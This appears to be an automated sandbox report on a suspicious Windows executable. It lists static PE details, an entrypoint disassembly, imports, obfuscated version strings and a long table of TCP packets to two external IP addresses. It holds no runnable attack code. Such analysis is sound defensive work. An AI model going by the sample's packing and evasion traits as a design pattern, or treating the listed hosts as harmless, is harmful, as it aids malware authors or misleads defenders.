SSDEEP:	12288:SzcmwRLNj6Jfko71uwBo2Uk3XezXUlCte2XMuOb27Wcpg:SzbwRLNj6J771/Bo9JtNTOC7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L..

File Icon


Icon Hash:	e0e4e8beb0e4c8ea

Static PE Info

General
Entrypoint:	0x401b2c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5FC5E9BE [Tue Dec 1 06:59:10 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	f98cc9327e2d65cc6189a693f26e1c1d

Entrypoint Preview

Instruction
call 00007F914CC4AB9Ch
jmp 00007F914CC47FADh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [00488008h+ecx*8]
je 00007F914CC48145h
inc ecx
cmp ecx, 2Dh
jc 00007F914CC48123h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007F914CC48140h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0048800Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007F914CC4A801h
test eax, eax
jne 00007F914CC48138h
mov eax, 00488170h
ret
add eax, 08h
ret
call 00007F914CC4A7EEh
test eax, eax
jne 00007F914CC48138h
mov eax, 00488174h
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007F914CC48117h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007F914CC480B7h
pop ecx
mov esi, eax
call 00007F914CC480F1h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
push 0000000Ch
push 004865D8h
call 00007F914CC48EBCh
mov ecx, dword ptr [ebp+08h]
xor edi, edi
cmp ecx, edi
jbe 00007F914CC48160h
push FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, dword ptr [ebp+0Ch]
sbb eax, eax
inc eax
jne 00007F914CC48151h
call 00007F914CC480C3h
mov dword ptr [eax], 0000000Ch
push edi
push edi
push edi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x871a0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8692c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10e000	0xa8f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x841c0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x85480	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x84000	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x82660	0x82800	False	0.975634578544	data	7.9868866426	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x84000	0x31f0	0x3200	False	0.256953125	data	4.156391323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x88000	0x8557c	0x1e00	False	0.117708333333	data	1.31907716101	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x10e000	0xa8f0	0xaa00	False	0.668910845588	data	6.07126830195	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x10e3f0	0xea8	data	English	United States
RT_ICON	0x10f298	0x8a8	data	English	United States
RT_ICON	0x10fb40	0x6c8	data	English	United States
RT_ICON	0x110208	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x110770	0x25a8	data	English	United States
RT_ICON	0x112d18	0x10a8	data	English	United States
RT_ICON	0x113dc0	0x988	data	English	United States
RT_ICON	0x114748	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x114c28	0x6c8	data	English	United States
RT_ICON	0x1152f0	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x115858	0x25a8	data	English	United States
RT_ICON	0x117e00	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_STRING	0x1184c8	0x424	data
RT_ACCELERATOR	0x1182a8	0x50	data
RT_ACCELERATOR	0x1182f8	0x20	data
RT_GROUP_ICON	0x118268	0x3e	data	English	United States
RT_GROUP_ICON	0x114bb0	0x76	data	English	United States
RT_VERSION	0x118318	0x1b0	data

Imports

DLL

Import

KERNEL32.dll

HeapReAlloc, GetLocaleInfoA, LoadResource, InterlockedIncrement, GetEnvironmentStringsW, AddConsoleAliasW, SetEvent, OpenSemaphoreA, GetSystemTimeAsFileTime, GetCommandLineA, WriteFileGather, CreateActCtxW, GetEnvironmentStrings, LeaveCriticalSection, GetFileAttributesA, ReadFile, GetDevicePowerState, GetProcAddress, FreeUserPhysicalPages, VerLanguageNameW, WriteConsoleA, GetProcessId, LocalAlloc, RemoveDirectoryW, GlobalGetAtomNameW, WaitForMultipleObjects, EnumResourceTypesW, GetModuleFileNameA, GetModuleHandleA, EraseTape, GetStringTypeW, ReleaseMutex, EndUpdateResourceA, LocalSize, FindFirstVolumeW, FindNextVolumeA, lstrcpyW, HeapAlloc, GetStartupInfoA, DeleteCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, GetLastError, SetFilePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, CloseHandle, CreateFileA

USER32.dll

GetCursorPos

Exports

Name	Ordinal	Address
@SetViceVariants@12	1	0x401000

Version Infos

Description	Data
InternalName	sajbmiamezu.ise
ProductVersion	8.64.59.5
Copyright	Copyrighz (C) 2021, fudkagat
Translation	0x0127 0x0081

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 18:33:07.443809986 CEST	49740	443	192.168.2.6	88.99.75.82
Sep 27, 2021 18:33:07.443856001 CEST	443	49740	88.99.75.82	192.168.2.6
Sep 27, 2021 18:33:07.444000959 CEST	49740	443	192.168.2.6	88.99.75.82
Sep 27, 2021 18:33:07.460839033 CEST	49740	443	192.168.2.6	88.99.75.82
Sep 27, 2021 18:33:07.460875988 CEST	443	49740	88.99.75.82	192.168.2.6
Sep 27, 2021 18:33:07.565421104 CEST	443	49740	88.99.75.82	192.168.2.6
Sep 27, 2021 18:33:07.565608025 CEST	49740	443	192.168.2.6	88.99.75.82
Sep 27, 2021 18:33:07.958369970 CEST	49740	443	192.168.2.6	88.99.75.82
Sep 27, 2021 18:33:07.958401918 CEST	443	49740	88.99.75.82	192.168.2.6
Sep 27, 2021 18:33:07.958719015 CEST	443	49740	88.99.75.82	192.168.2.6
Sep 27, 2021 18:33:07.958815098 CEST	49740	443	192.168.2.6	88.99.75.82
Sep 27, 2021 18:33:07.965439081 CEST	49740	443	192.168.2.6	88.99.75.82
Sep 27, 2021 18:33:08.011140108 CEST	443	49740	88.99.75.82	192.168.2.6
Sep 27, 2021 18:33:08.082767010 CEST	443	49740	88.99.75.82	192.168.2.6
Sep 27, 2021 18:33:08.082796097 CEST	443	49740	88.99.75.82	192.168.2.6
Sep 27, 2021 18:33:08.082823038 CEST	443	49740	88.99.75.82	192.168.2.6
Sep 27, 2021 18:33:08.082938910 CEST	49740	443	192.168.2.6	88.99.75.82
Sep 27, 2021 18:33:08.082959890 CEST	443	49740	88.99.75.82	192.168.2.6
Sep 27, 2021 18:33:08.082993031 CEST	49740	443	192.168.2.6	88.99.75.82
Sep 27, 2021 18:33:08.083030939 CEST	49740	443	192.168.2.6	88.99.75.82
Sep 27, 2021 18:33:08.086275101 CEST	49740	443	192.168.2.6	88.99.75.82
Sep 27, 2021 18:33:08.086297035 CEST	443	49740	88.99.75.82	192.168.2.6
Sep 27, 2021 18:33:08.215325117 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.236507893 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.236700058 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.238046885 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.259089947 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.345690012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.345793962 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.349280119 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.370603085 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.370640993 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.370665073 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.370692968 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.370757103 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.370780945 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.370784998 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.370839119 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.370863914 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.370867968 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.370894909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.370958090 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.370973110 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.370985985 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.371002913 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.371045113 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.392576933 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.392616034 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.392640114 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.392663956 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.392729998 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.392772913 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.392846107 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393013000 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393030882 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.393075943 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.393130064 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393157959 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393182039 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.393208027 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.393208027 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393235922 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393259048 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.393260002 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393282890 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.393285036 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393310070 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393315077 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.393340111 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393341064 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.393364906 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393373966 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.393389940 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393412113 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.393414974 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393440008 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393460035 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.393484116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393491983 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.393507957 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.393534899 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.393564939 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.413825035 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.413858891 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.413882971 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.413907051 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.413918018 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.413963079 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.414007902 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.414032936 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414086103 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.414093018 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414124012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414138079 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.414150000 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414172888 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.414175987 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414197922 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.414202929 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414218903 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.414228916 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414247036 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.414252996 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414277077 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.414278984 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414304018 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414307117 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.414336920 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.414366961 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.414705038 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414761066 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.414920092 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414948940 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414972067 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.414978027 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415013075 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415041924 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415054083 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415081978 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415105104 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415106058 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415143013 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415148973 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415175915 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415204048 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415275097 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415299892 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415323019 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415323973 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415348053 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415357113 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415380955 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415406942 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415410995 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415433884 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415452003 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415457964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415478945 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415505886 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415555000 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415580988 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415604115 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415607929 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415638924 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415666103 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415680885 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415705919 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415730000 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415762901 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415762901 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415791988 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415812969 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415817976 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415843010 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415848970 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415874958 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415904999 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415908098 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415934086 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.415956020 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.415987968 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.435514927 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435573101 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435592890 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435612917 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435636044 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435662985 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435688019 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435712099 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435714960 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.435735941 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435761929 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435781956 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.435786963 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435811996 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435821056 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.435838938 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435842037 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.435873985 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.435945988 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.435991049 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436058044 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436080933 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436101913 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436104059 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436129093 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436145067 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436152935 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436167955 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436189890 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436193943 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436216116 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436216116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436240911 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436243057 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436264038 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436271906 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436288118 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436294079 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436382055 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436386108 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436487913 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436517954 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436539888 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436541080 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436563015 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436587095 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436672926 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436743975 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436764002 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436820030 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.436886072 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.436934948 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437051058 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437074900 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437098026 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437098026 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437119007 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437119961 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437144995 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437165976 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437170029 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437211990 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437249899 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437273026 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437294006 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437294960 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437319040 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437338114 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437344074 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437377930 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437431097 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437454939 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437478065 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437479019 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437500000 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437505960 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437525988 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437530041 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437555075 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437577963 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.437695980 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437722921 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.437745094 CEST	80	49741	23.88.105.196	192.168.2.6
